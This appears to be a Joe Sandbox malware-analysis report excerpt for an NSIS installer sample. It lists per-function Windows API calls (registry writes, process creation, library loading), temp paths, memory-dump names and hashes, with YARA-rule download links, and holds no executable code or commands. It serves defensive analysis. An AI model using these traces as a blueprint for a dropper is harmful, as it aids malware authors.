                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Timeout
                                                                                                                                • String ID: !
                                                                                                                                • API String ID: 1777923405-2657877971
                                                                                                                                • Opcode ID: d3cd4e237e97a83a370d1370055c4bdc9f0797550a95890627c0fc6a79ec6b1b
                                                                                                                                • Instruction ID: 74a91dccfe9731269d403f92625f9bdea7e35384dcad0b9637cdbdb8d435ba20
                                                                                                                                • Opcode Fuzzy Hash: d3cd4e237e97a83a370d1370055c4bdc9f0797550a95890627c0fc6a79ec6b1b
                                                                                                                                • Instruction Fuzzy Hash: 4D21C171948209AEEF05AFA5CE4AABE7BB4EF84308F14443EF502B61D0D7B84541DB18
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 004023DE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsm118D.tmp,00000023,00000011,00000002), ref: 00402429
                                                                                                                                • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsm118D.tmp,00000000,00000011,00000002), ref: 00402469
                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsm118D.tmp,00000000,00000011,00000002), ref: 00402551
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseValuelstrlen
                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsm118D.tmp
                                                                                                                                • API String ID: 2655323295-3586511968
                                                                                                                                • Opcode ID: 972b35bf3e304c8d22e4498676d2edb4e0bbd8187aaa9195bdbe53feed6e2042
                                                                                                                                • Instruction ID: 6bb9d856f7880fc58a9027dca602f60b1bf716c37025aa19f03bdcb786be9778
                                                                                                                                • Opcode Fuzzy Hash: 972b35bf3e304c8d22e4498676d2edb4e0bbd8187aaa9195bdbe53feed6e2042
                                                                                                                                • Instruction Fuzzy Hash: 33118171E00108AEEB10AFA5DE49EAEBAB8EB54354F11843AF504F71D1DBB84D419B58
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00402D2A Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402D98
                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402DB9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Close$Enum
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 464197530-0
                                                                                                                                • Opcode ID: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                                                                                                • Instruction ID: 79d7ed05643b621c8e133add132d673d265f3a1e436d48668917152172a1be90
                                                                                                                                • Opcode Fuzzy Hash: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                                                                                                • Instruction Fuzzy Hash: AD116A32540509FBDF129F90CE09BEE7B69EF58340F110036B905B50E0E7B5DE21AB68
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00405BFE: CharNextW.USER32(?,?,C:\,?,00405C72,C:\,C:\,?,?,76D63420,004059B0,?,C:\Users\user\AppData\Local\Temp\,76D63420,00000000), ref: 00405C0C
                                                                                                                                  • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C11
                                                                                                                                  • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C29
                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                  • Part of subcall function 004057B5: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057F8
                                                                                                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\Undige\trivant,?,00000000,000000F0), ref: 0040164D
                                                                                                                                Strings
                                                                                                                                • C:\Users\user\AppData\Local\Temp\Undige\trivant, xrefs: 00401640
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\Undige\trivant
                                                                                                                                • API String ID: 1892508949-226500509
                                                                                                                                • Opcode ID: 64933fb819e76c9c5a4bf4a349c51baae94111e9253f76940e8e3ccf7a91a371
                                                                                                                                • Instruction ID: f4fc84295b44ed4b17ac4e1ae603b231d2bd930c419d474b78473434f223dd35
                                                                                                                                • Opcode Fuzzy Hash: 64933fb819e76c9c5a4bf4a349c51baae94111e9253f76940e8e3ccf7a91a371
                                                                                                                                • Instruction Fuzzy Hash: 7711BE31504104ABCF316FA4CD01AAF36A0EF14368B28493BEA45B22F1DB3E4E519A4E
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00405C5B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,coleoptera Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                                                                                                  • Part of subcall function 00405BFE: CharNextW.USER32(?,?,C:\,?,00405C72,C:\,C:\,?,?,76D63420,004059B0,?,C:\Users\user\AppData\Local\Temp\,76D63420,00000000), ref: 00405C0C
                                                                                                                                  • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C11
                                                                                                                                  • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C29
                                                                                                                                • lstrlenW.KERNEL32(C:\,00000000,C:\,C:\,?,?,76D63420,004059B0,?,C:\Users\user\AppData\Local\Temp\,76D63420,00000000), ref: 00405CB4
                                                                                                                                • GetFileAttributesW.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,76D63420,004059B0,?,C:\Users\user\AppData\Local\Temp\,76D63420), ref: 00405CC4
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                • String ID: C:\
                                                                                                                                • API String ID: 3248276644-3404278061
                                                                                                                                • Opcode ID: a970eb1a3142989cf927e9e4643bcace7998e9650737c8fd412cf721476e62ae
                                                                                                                                • Instruction ID: 85ea7651a51856ee7c4c0712bbf35357d52fdd33bb29f336d43f3a771a20a055
                                                                                                                                • Opcode Fuzzy Hash: a970eb1a3142989cf927e9e4643bcace7998e9650737c8fd412cf721476e62ae
                                                                                                                                • Instruction Fuzzy Hash: 0DF0F925109F5215F622323A1D09EAF2554CF83368716463FF952B16D5DA3C99038D7D
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00406150 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,Call,?,?,004063C4,80000002), ref: 00406196
                                                                                                                                • RegCloseKey.KERNELBASE(?,?,004063C4,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll), ref: 004061A1
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseQueryValue
                                                                                                                                • String ID: Call
                                                                                                                                • API String ID: 3356406503-1824292864
                                                                                                                                • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                                                • Instruction ID: ccae29ee16f81b62eed190a0e72f85d1395cd89474178e8bc9e2f9375c5b4726
                                                                                                                                • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                                                • Instruction Fuzzy Hash: C7017172510209EADF21CF55CD05EDF3BA8EB54360F018035FD1596191D779D968CBA4
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00405867 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405890
                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0040589D
                                                                                                                                Strings
                                                                                                                                • Error launching installer, xrefs: 0040587A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                                                • String ID: Error launching installer
                                                                                                                                • API String ID: 3712363035-66219284
                                                                                                                                • Opcode ID: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                                                                                                • Instruction ID: d54ab7d3c02f92ec190dfac26e1bcd6e14271da7ed0e34d6283108f8b7c5a0e7
                                                                                                                                • Opcode Fuzzy Hash: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                                                                                                • Instruction Fuzzy Hash: D4E09AB5900209BFEB109F65DD49F7B77ACEB04744F004565BD50F2150D778D8148A78
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0040202C Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 00402057
                                                                                                                                  • Part of subcall function 004052E6: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,00000000,0041C000,76D623A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                                                                                                  • Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,00000000,0041C000,76D623A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                                                                                                  • Part of subcall function 004052E6: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,0040325E), ref: 00405341
                                                                                                                                  • Part of subcall function 004052E6: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll), ref: 00405353
                                                                                                                                  • Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                                                                                                  • Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                                                                                                  • Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                                                                                                • LoadLibraryExW.KERNELBASE(00000000,?,00000008,?,000000F0), ref: 00402068
                                                                                                                                • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,?,000000F0), ref: 004020E5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 334405425-0
                                                                                                                                • Opcode ID: 953b997ac775c04cbd0441a481d0b8612512d0b60dab740abc81934434bd1b9e
                                                                                                                                • Instruction ID: 42f79ed1eba5b951ee52ea84f7896f3e8cd2b7b6c2435203e6ffc1da5cb37fd9
                                                                                                                                • Opcode Fuzzy Hash: 953b997ac775c04cbd0441a481d0b8612512d0b60dab740abc81934434bd1b9e
                                                                                                                                • Instruction Fuzzy Hash: EF21C271900208EACF20AFA5CE4DAAE7A70AF04358F64413BF611B51E0DBBD8941DA5E
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00401B71 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GlobalFree.KERNEL32(007594E0), ref: 00401BE1
                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF3
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Global$AllocFree
                                                                                                                                • String ID: Call
                                                                                                                                • API String ID: 3394109436-1824292864
                                                                                                                                • Opcode ID: f3fbed8c59e12bb8f0c71ec90718954b46427ffbab8605654bb2098ce1dab203
                                                                                                                                • Instruction ID: 92ace51ac37ea5806125e07fe733601b5cdc010b72bea360b2f02f73c4ad7c89
                                                                                                                                • Opcode Fuzzy Hash: f3fbed8c59e12bb8f0c71ec90718954b46427ffbab8605654bb2098ce1dab203
                                                                                                                                • Instruction Fuzzy Hash: 4921C072A01100DFDB20EB94CE8495A76A9AF44318725013BF902F72D1DA78A9519B5D
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00402253 Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 004065C5: FindFirstFileW.KERNELBASE(?,00430298,C:\,00405CA4,C:\,C:\,00000000,C:\,C:\,?,?,76D63420,004059B0,?,C:\Users\user\AppData\Local\Temp\,76D63420), ref: 004065D0
                                                                                                                                  • Part of subcall function 004065C5: FindClose.KERNELBASE(00000000), ref: 004065DC
                                                                                                                                • lstrlenW.KERNEL32 ref: 00402293
                                                                                                                                • lstrlenW.KERNEL32(00000000), ref: 0040229E
                                                                                                                                • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004022C7
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileFindlstrlen$CloseFirstOperation
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1486964399-0
                                                                                                                                • Opcode ID: 834dd4c3fab03f97c3ef7fc9990c8d4f3de421b30695c3237dbe986a75224924
                                                                                                                                • Instruction ID: 7b2fc1264b4fb0dc72f9b007f51c651f6a3d170a065e006ef865ab6f7e8bf7d8
                                                                                                                                • Opcode Fuzzy Hash: 834dd4c3fab03f97c3ef7fc9990c8d4f3de421b30695c3237dbe986a75224924
                                                                                                                                • Instruction Fuzzy Hash: D6117C71904308AADB10EFF99E49A9EB7B8AF14354F10457FA405FB2D1E6BCD8408B59
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 1000289C Relevance: 3.2, APIs: 2, Instructions: 156fileCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • CreateFileA.KERNELBASE(00000000), ref: 1000295B
                                                                                                                                • GetLastError.KERNEL32 ref: 10002A62
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.10001049251.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.10000981678.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.10001121191.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.10001192333.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
